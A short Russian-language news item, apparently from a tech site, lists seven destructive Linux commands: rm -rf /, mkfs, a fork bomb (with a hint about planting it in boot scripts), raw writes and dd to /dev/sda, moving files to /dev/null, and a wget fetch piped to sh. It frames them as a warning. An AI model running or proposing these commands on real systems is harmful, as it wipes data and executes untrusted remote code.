• Linux Филиппинский студент Джан Ауза собрал список из 7 самых опасных команд в Linux. Внимание! Не надо испытывать эти команды на вашей рабочей системе — она будет полностью уничтожена. Пожалуйста, тренируйтесь в изолированных виртуальных средах.

    Первая и самая известная команда: rm -rf /. Введенная от имени суперпользователя, рекурсивно удалит все файлы.

    Намного быстрее форматирование: mkfs.ext3 /dev/sda. Эта команда уничтожит все файлы на диске /dev/sda.

    Прием, известный как forkbomb (от системного вызова fork(), который ветвит текущий процесс). Достаточно набрать в консоли :(){:|:&};: и вся память заполнится копиями процессов, результатом чего будет зависание. Особо интересный эффект можно получить, поместив данную команду в сценарии загрузки.

    Следующая команда портит жесткий диск /dev/sda: любая_команда > /dev/sda. Если вызванная команда выводит какие-либо данные, то они будут перенаправлены прямиком в начало диска, что приведет к потере данных.

    Вредоносный код можно разместить в интернете и вызвать его удалённо командой, которая, на первый взгляд, не вызывает никаких подозрений: wget некоторый_вредоносный_код -O- | sh

    Шестой способ вредительства заключается в том, чтобы отправить все файлы в "черную дыру" /dev/null. Сделать это можно следующим образом: mv /home/my_home_directory/* /dev/null

    И последний способ, который делает невозможным восстановление утерянных данных:
    dd if=/dev/urandom of=/dev/sda. В этом случае диск заполняется случайными данными.

Replies (2)